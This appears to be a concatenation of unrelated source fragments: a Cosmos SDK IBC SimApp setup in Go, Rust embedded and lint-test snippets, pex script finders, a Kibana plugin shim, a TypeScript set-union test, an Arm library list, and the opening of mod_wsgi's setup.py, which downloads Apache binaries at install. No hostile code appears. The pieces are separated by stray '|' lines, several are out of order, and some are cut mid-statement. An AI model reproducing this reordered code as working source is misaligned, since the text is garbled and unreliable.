scopedICAControllerKeeper := app.CapabilityKeeper.ScopeToModule(icacontrollertypes.SubModuleName)
scopedICAHostKeeper := app.CapabilityKeeper.ScopeToModule(icahosttypes.SubModuleName)
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// not replicate if you do not need to test core IBC or light clients.
scopedIBCMockKeeper := app.CapabilityKeeper.ScopeToModule(ibcmock.ModuleName)
scopedFeeMockKeeper := app.CapabilityKeeper.ScopeToModule(MockFeePort)
scopedICAMockKeeper := app.CapabilityKeeper.ScopeToModule(ibcmock.ModuleName + icacontrollertypes.SubModuleName)
// seal capability keeper after scoping modules
app.CapabilityKeeper.Seal()
// SDK module keepers
app.AccountKeeper = authkeeper.NewAccountKeeper(
appCodec, keys[authtypes.StoreKey], app.GetSubspace(authtypes.ModuleName), authtypes.ProtoBaseAccount, maccPerms,
)
app.BankKeeper = bankkeeper.NewBaseKeeper(
appCodec, keys[banktypes.StoreKey], app.AccountKeeper, app.GetSubspace(banktypes.ModuleName), app.ModuleAccountAddrs(),
)
stakingKeeper := stakingkeeper.NewKeeper(
appCodec, keys[stakingtypes.StoreKey], app.AccountKeeper, app.BankKeeper, app.GetSubspace(stakingtypes.ModuleName),
)
app.MintKeeper = mintkeeper.NewKeeper(
appCodec, keys[minttypes.StoreKey], app.GetSubspace(minttypes.ModuleName), &stakingKeeper,
app.AccountKeeper, app.BankKeeper, authtypes.FeeCollectorName,
)
app.DistrKeeper = distrkeeper.NewKeeper(
appCodec, keys[distrtypes.StoreKey], app.GetSubspace(distrtypes.ModuleName), app.AccountKeeper, app.BankKeeper,
&stakingKeeper, authtypes.FeeCollectorName, app.ModuleAccountAddrs(),
)
app.SlashingKeeper = slashingkeeper.NewKeeper(
appCodec, keys[slashingtypes.StoreKey], &stakingKeeper, app.GetSubspace(slashingtypes.ModuleName),
)
app.CrisisKeeper = crisiskeeper.NewKeeper(
app.GetSubspace(crisistypes.ModuleName), invCheckPeriod, app.BankKeeper, authtypes.FeeCollectorName,
)
app.FeeGrantKeeper = feegrantkeeper.NewKeeper(appCodec, keys[feegrant.StoreKey], app.AccountKeeper)
app.UpgradeKeeper = upgradekeeper.NewKeeper(skipUpgradeHeights, keys[upgradetypes.StoreKey], appCodec, homePath, app.BaseApp)
// register the staking hooks
// NOTE: stakingKeeper above is passed by reference, so that it will contain these hooks
app.StakingKeeper = *stakingKeeper.SetHooks(
stakingtypes.NewMultiStakingHooks(app.DistrKeeper.Hooks(), app.SlashingKeeper.Hooks()),
)
app.AuthzKeeper = authzkeeper.NewKeeper(keys[authzkeeper.StoreKey], appCodec, app.BaseApp.MsgServiceRouter())
// IBC Keepers
app.IBCKeeper = ibckeeper.NewKeeper(
appCodec, keys[ibchost.StoreKey], app.GetSubspace(ibchost.ModuleName), app.StakingKeeper, app.UpgradeKeeper, scopedIBCKeeper,
)
// register the proposal types
govRouter := govtypes.NewRouter()
govRouter.AddRoute(govtypes.RouterKey, govtypes.ProposalHandler).
AddRoute(paramproposal.RouterKey, params.NewParamChangeProposalHandler(app.ParamsKeeper)).
AddRoute(distrtypes.RouterKey, distr.NewCommunityPoolSpendProposalHandler(app.DistrKeeper)).
AddRoute(upgradetypes.RouterKey, upgrade.NewSoftwareUpgradeProposalHandler(app.UpgradeKeeper)).
AddRoute(ibcclienttypes.RouterKey, ibcclient.NewClientProposalHandler(app.IBCKeeper.ClientKeeper))
app.GovKeeper = govkeeper.NewKeeper(
appCodec, keys[govtypes.StoreKey], app.GetSubspace(govtypes.ModuleName), app.AccountKeeper, app.BankKeeper,
&stakingKeeper, govRouter,
)
// IBC Fee Module keeper
app.IBCFeeKeeper = ibcfeekeeper.NewKeeper(
appCodec, keys[ibcfeetypes.StoreKey], app.GetSubspace(ibcfeetypes.ModuleName),
app.IBCKeeper.ChannelKeeper, // may be replaced with IBC middleware
app.IBCKeeper.ChannelKeeper,
&app.IBCKeeper.PortKeeper, app.AccountKeeper, app.BankKeeper,
)
// ICA Controller keeper
app.ICAControllerKeeper = icacontrollerkeeper.NewKeeper(
appCodec, keys[icacontrollertypes.StoreKey], app.GetSubspace(icacontrollertypes.SubModuleName),
app.IBCKeeper.ChannelKeeper, // may be replaced with middleware such as ics29 fee
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
scopedICAControllerKeeper, app.MsgServiceRouter(),
)
// ICA Host keeper
app.ICAHostKeeper = icahostkeeper.NewKeeper(
appCodec, keys[icahosttypes.StoreKey], app.GetSubspace(icahosttypes.SubModuleName),
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
app.AccountKeeper, scopedICAHostKeeper, app.MsgServiceRouter(),
)
// Create IBC Router
ibcRouter := porttypes.NewRouter()
// Middleware Stacks
// Create Transfer Keeper and pass IBCFeeKeeper as expected Channel and PortKeeper
// since fee middleware will wrap the IBCKeeper for underlying application.
app.TransferKeeper = ibctransferkeeper.NewKeeper(
appCodec, keys[ibctransfertypes.StoreKey], app.GetSubspace(ibctransfertypes.ModuleName),
app.IBCFeeKeeper, // ISC4 Wrapper: fee IBC middleware
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
app.AccountKeeper, app.BankKeeper, scopedTransferKeeper,
)
// Mock Module Stack
// Mock Module setup for testing IBC and also acts as the interchain accounts authentication module
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// not replicate if you do not need to test core IBC or light clients.
mockModule := ibcmock.NewAppModule(&app.IBCKeeper.PortKeeper)
// The mock module is used for testing IBC
mockIBCModule := ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp(ibcmock.ModuleName, scopedIBCMockKeeper))
ibcRouter.AddRoute(ibcmock.ModuleName, mockIBCModule)
// Create Transfer Stack
// SendPacket, since it is originating from the application to core IBC:
// transferKeeper.SendPacket -> fee.SendPacket -> channel.SendPacket
// RecvPacket, message that originates from core IBC and goes down to app, the flow is the other way
// channel.RecvPacket -> fee.OnRecvPacket -> transfer.OnRecvPacket
// transfer stack contains (from top to bottom):
// - IBC Fee Middleware
// - Transfer
// create IBC module from bottom to top of stack
var transferStack porttypes.IBCModule
transferStack = transfer.NewIBCModule(app.TransferKeeper)
transferStack = ibcfee.NewIBCMiddleware(transferStack, app.IBCFeeKeeper)
// Add transfer stack to IBC Router
ibcRouter.AddRoute(ibctransfertypes.ModuleName, transferStack)
// Create Interchain Accounts Stack
// SendPacket, since it is originating from the application to core IBC:
// icaAuthModuleKeeper.SendTx -> icaControllerKeeper.SendPacket -> channel.SendPacket
// initialize ICA module with mock module as the authentication module on the controller side
var icaControllerStack porttypes.IBCModule
icaControllerStack = ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp("", scopedICAMockKeeper))
app.ICAAuthModule = icaControllerStack.(ibcmock.IBCModule)
icaControllerStack = icacontroller.NewIBCMiddleware(icaControllerStack, app.ICAControllerKeeper)
icaHostIBCModule := icahost.NewIBCModule(app.ICAHostKeeper)
// Add host, controller & ica auth modules to IBC router
ibcRouter.
// the ICA Controller middleware needs to be explicitly added to the IBC Router because the
// ICA controller module owns the port capability for ICA. The ICA authentication module
// owns the channel capability.
AddRoute(icacontrollertypes.SubModuleName, icaControllerStack).
AddRoute(icahosttypes.SubModuleName, icaHostIBCModule).
AddRoute(ibcmock.ModuleName+icacontrollertypes.SubModuleName, icaControllerStack) // ica with mock auth module stack route to ica (top level of middleware stack)
// Create Mock IBC Fee module stack for testing
// SendPacket, since it is originating from the application to core IBC:
// mockModule.SendPacket -> fee.SendPacket -> channel.SendPacket
// OnRecvPacket, message that originates from core IBC and goes down to app, the flow is the otherway
// channel.RecvPacket -> fee.OnRecvPacket -> mockModule.OnRecvPacket
// OnAcknowledgementPacket as this is where fee's are paid out
// mockModule.OnAcknowledgementPacket -> fee.OnAcknowledgementPacket -> channel.OnAcknowledgementPacket
// create fee wrapped mock module
feeMockModule := ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp(MockFeePort, scopedFeeMockKeeper))
app.FeeMockModule = feeMockModule
feeWithMockModule := ibcfee.NewIBCMiddleware(feeMockModule, app.IBCFeeKeeper)
ibcRouter.AddRoute(MockFeePort, feeWithMockModule)
// Seal the IBC Router
app.IBCKeeper.SetRouter(ibcRouter)
// create evidence keeper with router
evidenceKeeper := evidencekeeper.NewKeeper(
appCodec, keys[evidencetypes.StoreKey], &app.StakingKeeper, app.SlashingKeeper,
)
// If evidence needs to be handled for the app, set routes in router here and seal
app.EvidenceKeeper = *evidenceKeeper
/**** Module Options ****/
// NOTE: we may consider parsing `appOpts` inside module constructors. For the moment
// we prefer to be more strict in what arguments the modules expect.
var skipGenesisInvariants = cast.ToBool(appOpts.Get(crisis.FlagSkipGenesisInvariants))
// NOTE: Any module instantiated in the module manager that is later modified
// must be passed by reference here.
app.mm = module.NewManager(
// SDK app modules
genutil.NewAppModule(
app.AccountKeeper, app.StakingKeeper, app.BaseApp.DeliverTx,
encodingConfig.TxConfig,
),
auth.NewAppModule(appCodec, app.AccountKeeper, authsims.RandomGenesisAccounts),
vesting.NewAppModule(app.AccountKeeper, app.BankKeeper),
bank.NewAppModule(appCodec, app.BankKeeper, app.AccountKeeper),
capability.NewAppModule(appCodec, *app.CapabilityKeeper),
crisis.NewAppModule(&app.CrisisKeeper, skipGenesisInvariants),
feegrantmodule.NewAppModule(appCodec, app.AccountKeeper, app.BankKeeper, app.FeeGrantKeeper, app.interfaceRegistry),
gov.NewAppModule(appCodec, app.GovKeeper, app.AccountKeeper, app.BankKeeper),
mint.NewAppModule(appCodec, app.MintKeeper, app.AccountKeeper),
slashing.NewAppModule(appCodec, app.SlashingKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
distr.NewAppModule(appCodec, app.DistrKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
staking.NewAppModule(appCodec, app.StakingKeeper, app.AccountKeeper, app.BankKeeper),
upgrade.NewAppModule(app.UpgradeKeeper),
evidence.NewAppModule(app.EvidenceKeeper),
ibc.NewAppModule(app.IBCKeeper),
params.NewAppModule(app.ParamsKeeper),
authzmodule.NewAppModule(appCodec, app.AuthzKeeper, app.AccountKeeper, app.BankKeeper, app.interfaceRegistry),
// IBC modules
transfer.NewAppModule(app.TransferKeeper),
ibcfee.NewAppModule(app.IBCFeeKeeper),
ica.NewAppModule(&app.ICAControllerKeeper, &app.ICAHostKeeper),
mockModule,
)
// During begin block slashing happens after distr.BeginBlocker so that
// there is nothing left over in the validator fee pool, so as to keep the
// CanWithdrawInvariant invariant.
// NOTE: staking module is required if HistoricalEntries param > 0
// NOTE: capability module's beginblocker must come before any modules using capabilities (e.g. IBC)
app.mm.SetOrderBeginBlockers(
upgradetypes.ModuleName, capabilitytypes.ModuleName, minttypes.ModuleName, distrtypes.ModuleName, slashingtypes.ModuleName,
evidencetypes.ModuleName, stakingtypes.ModuleName, ibchost.ModuleName, ibctransfertypes.ModuleName, authtypes.ModuleName,
banktypes.ModuleName, govtypes.ModuleName, crisistypes.ModuleName, genutiltypes.ModuleName, authz.ModuleName, feegrant.ModuleName,
paramstypes.ModuleName, vestingtypes.ModuleName, icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName,
)
app.mm.SetOrderEndBlockers(
crisistypes.ModuleName, govtypes.ModuleName, stakingtypes.ModuleName, ibchost.ModuleName, ibctransfertypes.ModuleName,
capabilitytypes.ModuleName, authtypes.ModuleName, banktypes.ModuleName, distrtypes.ModuleName, slashingtypes.ModuleName,
minttypes.ModuleName, genutiltypes.ModuleName, evidencetypes.ModuleName, authz.ModuleName, feegrant.ModuleName, paramstypes.ModuleName,
upgradetypes.ModuleName, vestingtypes.ModuleName, icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName,
)
// NOTE: The genutils module must occur after staking so that pools are
// properly initialized with tokens from genesis accounts.
// NOTE: Capability module must occur first so that it can initialize any capabilities
// so that other modules that want to create or claim capabilities afterwards in InitChain
// can do so safely.
app.mm.SetOrderInitGenesis(
capabilitytypes.ModuleName, authtypes.ModuleName, banktypes.ModuleName, distrtypes.ModuleName, stakingtypes.ModuleName,
slashingtypes.ModuleName, govtypes.ModuleName, minttypes.ModuleName, crisistypes.ModuleName,
ibchost.ModuleName, genutiltypes.ModuleName, evidencetypes.ModuleName, authz.ModuleName, ibctransfertypes.ModuleName,
icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName, feegrant.ModuleName, paramstypes.ModuleName, upgradetypes.ModuleName, vestingtypes.ModuleName,
)
app.mm.RegisterInvariants(&app.CrisisKeeper)
app.mm.RegisterRoutes(app.Router(), app.QueryRouter(), encodingConfig.Amino)
app.configurator = module.NewConfigurator(app.appCodec, app.MsgServiceRouter(), app.GRPCQueryRouter())
app.mm.RegisterServices(app.configurator)
// add test gRPC service for testing gRPC queries in isolation
testdata.RegisterQueryServer(app.GRPCQueryRouter(), testdata.QueryImpl{})
// create the simulation manager and define the order of the modules for deterministic simulations
//
// NOTE: this is not required apps that don't use the simulator for fuzz testing
// transactions
app.sm = module.NewSimulationManager(
auth.NewAppModule(appCodec, app.AccountKeeper, authsims.RandomGenesisAccounts),
bank.NewAppModule(appCodec, app.BankKeeper, app.AccountKeeper),
capability.NewAppModule(appCodec, *app.CapabilityKeeper),
feegrantmodule.NewAppModule(appCodec, app.AccountKeeper, app.BankKeeper, app.FeeGrantKeeper, app.interfaceRegistry),
gov.NewAppModule(appCodec, app.GovKeeper, app.AccountKeeper, app.BankKeeper),
mint.NewAppModule(appCodec, app.MintKeeper, app.AccountKeeper),
staking.NewAppModule(appCodec, app.StakingKeeper, app.AccountKeeper, app.BankKeeper),
distr.NewAppModule(appCodec, app.DistrKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
slashing.NewAppModule(appCodec, app.SlashingKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
params.NewAppModule(app.ParamsKeeper),
evidence.NewAppModule(app.EvidenceKeeper),
authzmodule.NewAppModule(appCodec, app.AuthzKeeper, app.AccountKeeper, app.BankKeeper, app.interfaceRegistry),
ibc.NewAppModule(app.IBCKeeper),
transfer.NewAppModule(app.TransferKeeper),
)
app.sm.RegisterStoreDecoders()
// initialize stores
app.MountKVStores(keys)
app.MountTransientStores(tkeys)
app.MountMemoryStores(memKeys)
// initialize BaseApp
app.SetInitChainer(app.InitChainer)
app.SetBeginBlocker(app.BeginBlocker)
anteHandler, err := NewAnteHandler(
HandlerOptions{
HandlerOptions: ante.HandlerOptions{
AccountKeeper: app.AccountKeeper,
BankKeeper: app.BankKeeper,
SignModeHandler: encodingConfig.TxConfig.SignModeHandler(),
FeegrantKeeper: app.FeeGrantKeeper,
SigGasConsumer: ante.DefaultSigVerificationGasConsumer,
},
IBCKeeper: app.IBCKeeper,
},
)
if err != nil {
panic(err)
}
app.SetAnteHandler(anteHandler)
app.SetEndBlocker(app.EndBlocker)
if loadLatest {
if err := app.LoadLatestVersion(); err != nil {
tmos.Exit(err.Error())
}
}
app.ScopedIBCKeeper = scopedIBCKeeper
app.ScopedTransferKeeper = scopedTransferKeeper
app.ScopedICAControllerKeeper = scopedICAControllerKeeper
app.ScopedICAHostKeeper = scopedICAHostKeeper
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// note replicate if you do not need to test core IBC or light clients.
app.ScopedIBCMockKeeper = scopedIBCMockKeeper
app.ScopedICAMockKeeper = scopedICAMockKeeper
app.ScopedFeeMockKeeper = scopedFeeMockKeeper
return app
}
// Name returns the name of the App
func (app *SimApp) Name() string { return app.BaseApp.Name() }
// BeginBlocker application updates every begin block
func (app *SimApp) BeginBlocker(ctx sdk.Context, req abci.RequestBeginBlock) abci.ResponseBeginBlock {
return app.mm.BeginBlock(ctx, req)
}
// EndBlocker application updates every end block
func (app *SimApp) EndBlocker(ctx sdk.Context, req abci.RequestEndBlock) abci.ResponseEndBlock {
return app.mm.EndBlock(ctx, req)
}
// InitChainer application update at chain initialization
func (app *SimApp) InitChainer(ctx sdk.Context, req abci.RequestInitChain) abci.ResponseInitChain {
var genesisState GenesisState
if err := json.Unmarshal(req.AppStateBytes, &genesisState); err != nil {
panic(err)
}
app.UpgradeKeeper.SetModuleVersionMap(ctx, app.mm.GetVersionMap())
return app.mm.InitGenesis(ctx, app.appCodec, genesisState)
}
// LoadHeight loads a particular height
func (app *SimApp) LoadHeight(height int64) error {
return app.LoadVersion(height)
}
// ModuleAccountAddrs returns all the app's module account addresses.
func (app *SimApp) ModuleAccountAddrs() map[string]bool {
modAccAddrs := make(map[string]bool)
for acc := range maccPerms {
modAccAddrs[authtypes.NewModuleAddress(acc).String()] = true
}
return modAccAddrs
}
// GetModuleManager returns the app module manager
// NOTE: used for testing purposes
func (app *SimApp) GetModuleManager() *module.Manager {
return app.mm
}
// LegacyAmino returns SimApp's amino codec.
//
// NOTE: This is solely to be used for testing purposes as it may be desirable
// for modules to register their own custom testing types.
func (app *SimApp) LegacyAmino() *codec.LegacyAmino {
return app.legacyAmino
}
// AppCodec returns SimApp's app codec.
//
// NOTE: This is solely to be used for testing purposes as it may be desirable
// for modules to register their own custom testing types.
func (app *SimApp) AppCodec() codec.Codec {
return app.appCodec
}
// InterfaceRegistry returns SimApp's InterfaceRegistry
func (app *SimApp) InterfaceRegistry() types.InterfaceRegistry {
return app.interfaceRegistry
}
// GetKey returns the KVStoreKey for the provided store key.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetKey(storeKey string) *sdk.KVStoreKey {
return app.keys[storeKey]
}
// GetTKey returns the TransientStoreKey for the provided store key.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetTKey(storeKey string) *sdk.TransientStoreKey {
return app.tkeys[storeKey]
}
// GetMemKey returns the MemStoreKey for the provided mem key.
//
// NOTE: This is solely used for testing purposes.
func (app *SimApp) GetMemKey(storeKey string) *sdk.MemoryStoreKey {
return app.memKeys[storeKey]
}
// GetSubspace returns a param subspace for a given module name.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetSubspace(moduleName string) paramstypes.Subspace {
subspace, _ := app.ParamsKeeper.GetSubspace(moduleName)
return subspace
}
// TestingApp functions
// GetBaseApp implements the TestingApp interface.
func (app *SimApp) GetBaseApp() *baseapp.BaseApp {
return app.BaseApp
}
// GetStakingKeeper implements the TestingApp interface.
func (app *SimApp) GetStakingKeeper() stakingkeeper.Keeper {
return app.StakingKeeper
}
// GetIBCKeeper implements the TestingApp interface.
func (app *SimApp) GetIBCKeeper() *ibckeeper.Keeper {
return app.IBCKeeper
}
// GetScopedIBCKeeper implements the TestingApp interface.
func (app *SimApp) GetScopedIBCKeeper() capabilitykeeper.ScopedKeeper {
return app.ScopedIBCKeeper
}
// GetTxConfig implements the TestingApp interface.
func (app *SimApp) GetTxConfig() client.TxConfig {
return MakeTestEncodingConfig().TxConfig
}
// SimulationManager implements the SimulationApp interface
func (app *SimApp) SimulationManager() *module.SimulationManager {
return app.sm
}
// RegisterAPIRoutes registers all application module routes with the provided
// API server.
func (app *SimApp) RegisterAPIRoutes(apiSvr *api.Server, apiConfig config.APIConfig) {
clientCtx := apiSvr.ClientCtx
rpc.RegisterRoutes(clientCtx, apiSvr.Router)
// Register legacy tx routes.
authrest.RegisterTxRoutes(clientCtx, apiSvr.Router)
// Register new tx routes from grpc-gateway.
authtx.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// Register new tendermint queries routes from grpc-gateway.
tmservice.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// Register legacy and grpc-gateway routes for all modules.
ModuleBasics.RegisterRESTRoutes(clientCtx, apiSvr.Router)
ModuleBasics.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// register swagger API from root so that other applications can override easily
if apiConfig.Swagger {
RegisterSwaggerAPI(clientCtx, apiSvr.Router)
}
}
// RegisterTxService implements the Application.RegisterTxService method.
func (app *SimApp) RegisterTxService(clientCtx client.Context) {
authtx.RegisterTxService(app.BaseApp.GRPCQueryRouter(), clientCtx, app.BaseApp.Simulate, app.interfaceRegistry)
}
// RegisterTendermintService implements the Application.RegisterTendermintService method.
func (app *SimApp) RegisterTendermintService(clientCtx client.Context) {
tmservice.RegisterTendermintService(app.BaseApp.GRPCQueryRouter(), clientCtx, app.interfaceRegistry)
}
// RegisterSwaggerAPI registers swagger route with API Server
func RegisterSwaggerAPI(ctx client.Context, rtr *mux.Router)
|
// GetMaccPerms returns a copy of the module account permissions
func GetMaccPerms() map[string][]string {
dupMaccPerms := make(map[string][]string)
for k, v := range maccPerms {
dupMaccPerms[k] = v
}
return dupMaccPerms
}
// initParamsKeeper init params keeper and its subspaces
func initParamsKeeper(appCodec codec.BinaryCodec, legacyAmino *codec.LegacyAmino, key, tkey sdk.StoreKey) paramskeeper.Keeper {
paramsKeeper := paramskeeper.NewKeeper(appCodec, legacyAmino, key, tkey)
paramsKeeper.Subspace(authtypes.ModuleName)
paramsKeeper.Subspace(banktypes.ModuleName)
paramsKeeper.Subspace(stakingtypes.ModuleName)
paramsKeeper.Subspace(minttypes.ModuleName)
paramsKeeper.Subspace(distrtypes.ModuleName)
paramsKeeper.Subspace(slashingtypes.ModuleName)
paramsKeeper.Subspace(govtypes.ModuleName).WithKeyTable(govtypes.ParamKeyTable())
paramsKeeper.Subspace(crisistypes.ModuleName)
paramsKeeper.Subspace(ibctransfertypes.ModuleName)
paramsKeeper.Subspace(ibchost.ModuleName)
paramsKeeper.Subspace(icacontrollertypes.SubModuleName)
paramsKeeper.Subspace(icahosttypes.SubModuleName)
return paramsKeeper
}
|
{
statikFS, err := fs.New()
if err != nil {
panic(err)
}
staticServer := http.FileServer(statikFS)
rtr.PathPrefix("/swagger/").Handler(http.StripPrefix("/swagger/", staticServer))
}
|
example_common.rs
|
use core::sync::atomic::{AtomicUsize, Ordering};
use defmt_rtt as _;
use panic_probe as _;
defmt::timestamp! {"{=u64}", {
static COUNT: AtomicUsize = AtomicUsize::new(0);
// NOTE(no-CAS) `timestamps` runs with interrupts disabled
let n = COUNT.load(Ordering::Relaxed);
COUNT.store(n + 1, Ordering::Relaxed);
|
n as u64
}
}
|
|
lint-misplaced-attr.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// When denying at the crate level, be sure to not get random warnings from the
// injected intrinsics by the compiler.
#![deny(attribute_usage)]
#![deny(unused_attribute)]
mod a {
#![crate_type = "bin"] //~ ERROR: crate-level attribute
//~^ ERROR: unused attribute
}
#[crate_type = "bin"] fn
|
() {} //~ ERROR: crate-level attribute
//~^ ERROR: unused attribute
|
main
|
finders.py
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import ast
import os
from pex.common import is_python_script
from pex.third_party.pkg_resources import Distribution
from pex.typing import TYPE_CHECKING, cast
if TYPE_CHECKING:
from typing import Optional
import attr # vendor:skip
else:
from pex.third_party import attr
@attr.s(frozen=True)
class DistributionScript(object):
@classmethod
def find(
cls,
dist, # type: Distribution
name, # type: str
):
# type: (...) -> Optional[DistributionScript]
script_path = os.path.join(dist.location, "bin", name)
return cls(dist=dist, path=script_path) if os.path.isfile(script_path) else None
dist = attr.ib() # type: Distribution
path = attr.ib() # type: str
def read_contents(self):
# type: () -> bytes
with open(self.path, "rb") as fp:
return fp.read()
def python_script(self):
|
try:
return cast(
ast.AST, compile(self.read_contents(), self.path, "exec", flags=0, dont_inherit=1)
)
except (SyntaxError, TypeError):
return None
def get_script_from_distributions(name, dists):
for dist in dists:
distribution_script = DistributionScript.find(dist, name)
if distribution_script:
return distribution_script
def get_entry_point_from_console_script(script, dists):
# Check all distributions for the console_script "script". De-dup by dist key to allow for a
# duplicate console script IFF the distribution is platform-specific and this is a multi-platform
# pex.
def get_entrypoint(dist):
script_entry = dist.get_entry_map().get("console_scripts", {}).get(script)
if script_entry is not None:
# Entry points are of the form 'foo = bar', we just want the 'bar' part.
return str(script_entry).split("=")[1].strip()
entries = {}
for dist in dists:
entry_point = get_entrypoint(dist)
if entry_point is not None:
entries[dist.key] = (dist, entry_point)
if len(entries) > 1:
raise RuntimeError(
"Ambiguous script specification %s matches multiple entry points:\n\t%s"
% (
script,
"\n\t".join(
"%r from %r" % (entry_point, dist) for dist, entry_point in entries.values()
),
)
)
dist, entry_point = None, None
if entries:
dist, entry_point = next(iter(entries.values()))
return dist, entry_point
|
# type: () -> Optional[ast.AST]
if not is_python_script(self.path):
return None
|
legacy.ts
|
/*
* Licensed to Elasticsearch B.V. under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch B.V. licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
|
*/
import { PluginInitializerContext } from 'kibana/public';
import { npSetup, npStart } from 'ui/new_platform';
import { TagCloudPluginSetupDependencies } from './plugin';
import { plugin } from '.';
const plugins: Readonly<TagCloudPluginSetupDependencies> = {
expressions: npSetup.plugins.expressions,
visualizations: npSetup.plugins.visualizations,
charts: npSetup.plugins.charts,
};
const pluginInstance = plugin({} as PluginInitializerContext);
export const setup = pluginInstance.setup(npSetup.core, plugins);
export const start = pluginInstance.start(npStart.core, { data: npStart.plugins.data });
|
* under the License.
|
union.Iterable.mutable.ts
|
import test from 'ava';
import { isMutable, modify } from '@collectable/core';
import { HashSetStructure, fromArray, size, union } from '../../src';
const mainValues = ['A', 'B', 'C', 'D', 'E'];
const otherValues = ['D', 'E', 'F', 'G'];
const expectedValues = ['A', 'B', 'C', 'D', 'E', 'F', 'G'];
let main: HashSetStructure<string>, result: HashSetStructure<string>;
let other: Iterable<string>;
test.before(() => {
other = new Set(otherValues).values();
main = modify(fromArray(mainValues));
result = union(other, main);
});
test('the input set is returned', t => {
t.is(result, main);
});
test('the input set is still mutable', t => {
t.true(isMutable(result));
});
test('the main set includes all items from both inputs', t => {
t.deepEqual(Array.from(result).sort(), expectedValues);
|
});
|
t.is(size(result), expectedValues.length);
|
arch_specific_libs.py
|
"""
Copyright 2017 Arm Ltd.
|
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
ARCH_SPECIFIC_LIBS = ['mkl', 'otherarch']
"""Libraries that are not available on aarch64."""
| |
setup.py
|
from __future__ import print_function
import os
import sys
import fnmatch
import subprocess
import tarfile
import shutil
import stat
import re
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
from setuptools import setup
from distutils.core import Extension
from distutils.sysconfig import get_config_var as get_python_config
from distutils.sysconfig import get_python_lib
# Before anything else, this setup.py uses some tricks to potentially
# install Apache. This can be from a local tarball, or from precompiled
# Apache binaries for Heroku and OpenShift environments downloaded from
# Amazon S3. Once they are installed, then the installation of the
# mod_wsgi package itself will be triggered, ensuring that it can be
# built against the precompiled Apache binaries which were installed.
#
# First work out whether we are actually running on either Heroku or
# OpenShift. If we are, then we identify the set of precompiled binaries
# we are to use and copy it into the Python installation.
PREFIX = 'https://s3.amazonaws.com'
BUCKET = os.environ.get('MOD_WSGI_REMOTE_S3_BUCKET_NAME', 'modwsgi.org')
REMOTE_TARBALL_NAME = os.environ.get('MOD_WSGI_REMOTE_PACKAGES_NAME')
LOCAL_TARBALL_FILE = os.environ.get('MOD_WSGI_LOCAL_PACKAGES_FILE')
TGZ_OPENSHIFT='mod_wsgi-packages-openshift-centos6-apache-2.4.12-1.tar.gz'
TGZ_HEROKU='mod_wsgi-packages-heroku-cedar14-apache-2.4.12-1.tar.gz'
if not REMOTE_TARBALL_NAME and not LOCAL_TARBALL_FILE:
if os.environ.get('OPENSHIFT_HOMEDIR'):
REMOTE_TARBALL_NAME = TGZ_OPENSHIFT
elif os.path.isdir('/app/.heroku'):
REMOTE_TARBALL_NAME = TGZ_HEROKU
REMOTE_TARBALL_URL = None
if LOCAL_TARBALL_FILE is None and REMOTE_TARBALL_NAME:
REMOTE_TARBALL_URL = '%s/%s/%s' % (PREFIX, BUCKET, REMOTE_TARBALL_NAME)
WITH_TARBALL_PACKAGE = False
if REMOTE_TARBALL_URL or LOCAL_TARBALL_FILE:
WITH_TARBALL_PACKAGE = True
# If we are doing an install, download the tarball and unpack it into
# the 'packages' subdirectory. We will then add everything in that
# directory as package data so that it will be installed into the Python
# installation.
if WITH_TARBALL_PACKAGE:
if REMOTE_TARBALL_URL:
if not os.path.isfile(REMOTE_TARBALL_NAME):
print('Downloading', REMOTE_TARBALL_URL)
urlretrieve(REMOTE_TARBALL_URL, REMOTE_TARBALL_NAME+'.download')
os.rename(REMOTE_TARBALL_NAME+'.download', REMOTE_TARBALL_NAME)
LOCAL_TARBALL_FILE = REMOTE_TARBALL_NAME
